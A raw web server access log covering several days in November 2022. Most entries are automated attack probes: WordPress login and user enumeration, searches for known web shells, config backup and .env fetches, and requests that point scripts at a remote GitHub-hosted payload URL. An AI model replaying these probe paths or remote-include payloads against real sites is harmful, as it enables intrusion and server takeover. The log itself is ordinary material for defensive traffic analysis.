157.55.39.154 - - [07/Nov/2022:05:46:39 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
85.215.117.241 - - [07/Nov/2022:06:53:08 +0100] "GET /wordpress/ HTTP/1.1" 301 531 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
85.215.117.241 - - [07/Nov/2022:06:53:12 +0100] "GET /wp/ HTTP/1.1" 301 517 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
85.215.117.241 - - [07/Nov/2022:06:53:13 +0100] "GET /blog/ HTTP/1.1" 301 521 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
85.215.117.241 - - [07/Nov/2022:06:53:15 +0100] "GET /old/ HTTP/1.1" 301 519 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
85.215.117.241 - - [07/Nov/2022:06:53:17 +0100] "GET /new/ HTTP/1.1" 301 519 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
85.215.117.241 - - [07/Nov/2022:06:53:19 +0100] "GET /test/ HTTP/1.1" 301 521 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
85.215.117.241 - - [07/Nov/2022:06:53:20 +0100] "GET /backup/ HTTP/1.1" 301 525 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
85.215.117.241 - - [07/Nov/2022:06:53:21 +0100] "GET /temp/ HTTP/1.1" 301 521 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
85.215.117.241 - - [07/Nov/2022:06:53:22 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
40.76.99.196 - - [07/Nov/2022:11:47:50 +0100] "GET /wp-includes/ HTTP/1.1" 301 535 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
161.35.114.17 - - [07/Nov/2022:17:20:32 +0100] "HEAD / HTTP/1.1" 301 185 "https://www.bing.com" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
161.35.114.17 - - [07/Nov/2022:17:20:34 +0100] "GET /wp-login.php HTTP/1.1" 301 479 "http://experiencias.asadorcasatomas.com" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
161.35.114.17 - - [07/Nov/2022:17:20:35 +0100] "GET /wordpress/wp-login.php HTTP/1.1" 301 499 "http://experiencias.asadorcasatomas.com" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
161.35.114.17 - - [07/Nov/2022:17:20:36 +0100] "GET /blog/wp-login.php HTTP/1.1" 301 489 "http://experiencias.asadorcasatomas.com" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
161.35.114.17 - - [07/Nov/2022:17:20:37 +0100] "GET /wp/wp-login.php HTTP/1.1" 301 485 "http://experiencias.asadorcasatomas.com" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
157.55.39.154 - - [07/Nov/2022:20:25:52 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
167.172.79.125 - - [07/Nov/2022:20:32:58 +0100] "GET /wp-login.php HTTP/1.1" 301 498 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96"
167.172.79.125 - - [07/Nov/2022:20:33:00 +0100] "GET ///?author=1 HTTP/1.1" 301 492 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96"
167.172.79.125 - - [07/Nov/2022:20:33:02 +0100] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 514 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96"
5.75.138.206 - - [07/Nov/2022:23:05:49 +0100] "GET /style.php HTTP/1.1" 301 529 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:05:51 +0100] "GET /moduless.php HTTP/1.1" 301 535 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:05:54 +0100] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 301 617 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:05:57 +0100] "GET /admin.php HTTP/1.1" 301 529 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:06:13 +0100] "GET /index.php?3x=3x HTTP/1.1" 301 541 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:06:18 +0100] "GET /boom.php?x HTTP/1.1" 301 531 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:06:21 +0100] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 301 581 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:06:24 +0100] "GET /wp-content/db_cache.php HTTP/1.1" 301 557 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:06:30 +0100] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 301 613 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:06:39 +0100] "GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 301 677 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:06:44 +0100] "GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 301 681 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:06:51 +0100] "GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 301 677 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:06:56 +0100] "GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 301 685 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:06:59 +0100] "GET /alfindex.php HTTP/1.1" 301 535 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:02 +0100] "GET /alfa.php HTTP/1.1" 301 527 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:04 +0100] "GET /wp-booking.php HTTP/1.1" 301 539 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:07 +0100] "GET /cindex.php HTTP/1.1" 301 531 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:09 +0100] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 301 565 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:12 +0100] "GET /wp-1ogin_bak.php HTTP/1.1" 301 543 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:15 +0100] "GET /wp-includes/fonts/css.php HTTP/1.1" 301 561 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:23 +0100] "GET /wp-includes/css/css.php HTTP/1.1" 301 557 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:30 +0100] "GET /old-index.php HTTP/1.1" 301 537 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:32 +0100] "GET /config.bak.php HTTP/1.1" 301 539 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:34 +0100] "GET /wp-admin/config.bak.php HTTP/1.1" 301 557 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:36 +0100] "GET /wp-content/config.bak.php HTTP/1.1" 301 561 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:38 +0100] "GET /wp-includes/config.bak.php HTTP/1.1" 301 563 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:41 +0100] "GET /wp-content/themes/config.bak.php HTTP/1.1" 301 575 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:07:43 +0100] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 301 577 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:08:22 +0100] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 301 569 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:08:25 +0100] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 301 581 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:08:29 +0100] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 301 595 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:08:45 +0100] "GET /haders.php HTTP/1.1" 301 531 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:08:48 +0100] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 301 631 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:08:54 +0100] "GET /legion.php HTTP/1.1" 301 531 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:09:06 +0100] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 301 587 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:09:12 +0100] "GET /wp-includes/lfx.php HTTP/1.1" 301 549 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:09:16 +0100] "GET /wp-includes/small.php HTTP/1.1" 301 553 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:09:18 +0100] "GET /up.php HTTP/1.1" 301 523 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:09:23 +0100] "GET /upload.php HTTP/1.1" 301 531 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:09:26 +0100] "GET /config.php HTTP/1.1" 301 531 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:09:29 +0100] "GET /test.php?Ghost=send HTTP/1.1" 301 549 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:09:31 +0100] "GET /wp-content/langar.php HTTP/1.1" 301 553 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:09:34 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 611 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:09:37 +0100] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 301 651 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
5.75.138.206 - - [07/Nov/2022:23:09:40 +0100] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 301 623 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
216.244.66.196 - - [08/Nov/2022:01:41:25 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
157.55.39.154 - - [08/Nov/2022:05:48:35 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
216.244.66.196 - - [08/Nov/2022:08:03:49 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
40.88.138.248 - - [08/Nov/2022:12:14:14 +0100] "GET /.env HTTP/1.1" 301 519 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
3.250.61.10 - - [08/Nov/2022:12:37:26 +0100] "GET /robots.txt HTTP/1.1" 301 494 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)"
157.55.39.154 - - [08/Nov/2022:16:53:30 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
216.244.66.196 - - [08/Nov/2022:20:33:38 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
205.210.31.56 - - [08/Nov/2022:21:18:42 +0100] "GET / HTTP/1.1" 301 455 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
216.244.66.196 - - [08/Nov/2022:21:50:45 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.196 - - [08/Nov/2022:22:42:36 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
172.173.184.58 - - [09/Nov/2022:01:11:07 +0100] "GET /wp-includes/ HTTP/1.1" 301 535 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0"
157.55.39.154 - - [09/Nov/2022:02:13:29 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
5.39.4.40 - - [09/Nov/2022:10:50:39 +0100] "GET / HTTP/1.1" 301 474 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
5.39.4.40 - - [09/Nov/2022:10:50:40 +0100] "GET / HTTP/1.1" 301 474 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
67.226.220.12 - - [09/Nov/2022:13:57:31 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36"
67.226.220.12 - - [09/Nov/2022:13:57:33 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36"
103.86.176.182 - - [09/Nov/2022:22:20:11 +0100] "GET /?author=21 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
103.86.176.182 - - [09/Nov/2022:22:20:11 +0100] "GET /?author=11 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
103.86.176.182 - - [09/Nov/2022:22:20:11 +0100] "GET /?author=31 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
211.13.204.1 - - [09/Nov/2022:22:20:25 +0100] "GET /?author=1 HTTP/1.1" 301 492 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
161.97.90.217 - - [09/Nov/2022:22:20:25 +0100] "GET /?author=41 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0"
216.244.66.196 - - [10/Nov/2022:00:56:34 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
40.88.138.248 - - [10/Nov/2022:08:30:23 +0100] "GET //wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 525 "-" "Go-http-client/1.1"
63.32.71.27 - - [10/Nov/2022:09:10:58 +0100] "GET /robots.txt HTTP/1.1" 301 494 "-" "webprosbot/2.0 (+mailto:abuse-6337@webpros.com)"
185.30.32.75 - - [10/Nov/2022:15:58:37 +0100] "GET /wp-json/wp/v2/users HTTP/1.1" 301 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
5.75.164.241 - - [10/Nov/2022:20:11:48 +0100] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 579 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
5.75.164.241 - - [10/Nov/2022:20:12:11 +0100] "GET /wp-includes/wp-class.php HTTP/1.1" 301 559 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
5.75.164.241 - - [10/Nov/2022:20:12:22 +0100] "GET /wp-admin/shell20211028.php HTTP/1.1" 301 563 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
34.28.127.186 - - [10/Nov/2022:22:08:19 +0100] "GET / HTTP/1.1" 301 511 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
216.244.66.196 - - [10/Nov/2022:23:49:18 +0100] "GET /robots.txt HTTP/1.1" 301 475 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
5.75.164.241 - - [11/Nov/2022:09:49:40 +0100] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 579 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
5.75.164.241 - - [11/Nov/2022:09:49:45 +0100] "GET /wp-content/wso.php HTTP/1.1" 301 547 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
69.49.112.66 - - [11/Nov/2022:13:18:02 +0100] "GET /?author=41 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
103.7.43.56 - - [11/Nov/2022:13:18:08 +0100] "GET /?author=11 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
69.49.112.72 - - [11/Nov/2022:13:18:13 +0100] "GET /?author=81 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1"
65.108.97.18 - - [11/Nov/2022:13:18:24 +0100] "GET /?author=51 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
95.216.41.99 - - [11/Nov/2022:13:18:40 +0100] "GET /?author=111 HTTP/1.1" 301 496 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
103.148.195.11 - - [11/Nov/2022:13:18:41 +0100] "GET /?author=131 HTTP/1.1" 301 496 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
69.49.112.61 - - [11/Nov/2022:13:18:49 +0100] "GET /?author=1 HTTP/1.1" 301 492 "-" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0"
23.239.3.85 - - [11/Nov/2022:13:19:02 +0100] "GET /?author=141 HTTP/1.1" 301 496 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
161.35.237.196 - - [11/Nov/2022:13:19:16 +0100] "GET /?author=61 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0"
80.74.145.155 - - [11/Nov/2022:13:19:24 +0100] "GET /?author=31 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
69.49.112.71 - - [11/Nov/2022:13:19:29 +0100] "GET /?author=101 HTTP/1.1" 301 496 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
5.9.88.146 - - [11/Nov/2022:13:19:35 +0100] "GET /?author=91 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
65.49.39.17 - - [11/Nov/2022:13:19:36 +0100] "GET /?author=91 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"
92.205.10.94 - - [11/Nov/2022:13:19:41 +0100] "GET /?author=21 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
188.166.34.180 - - [11/Nov/2022:13:19:57 +0100] "GET /?author=71 HTTP/1.1" 301 494 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
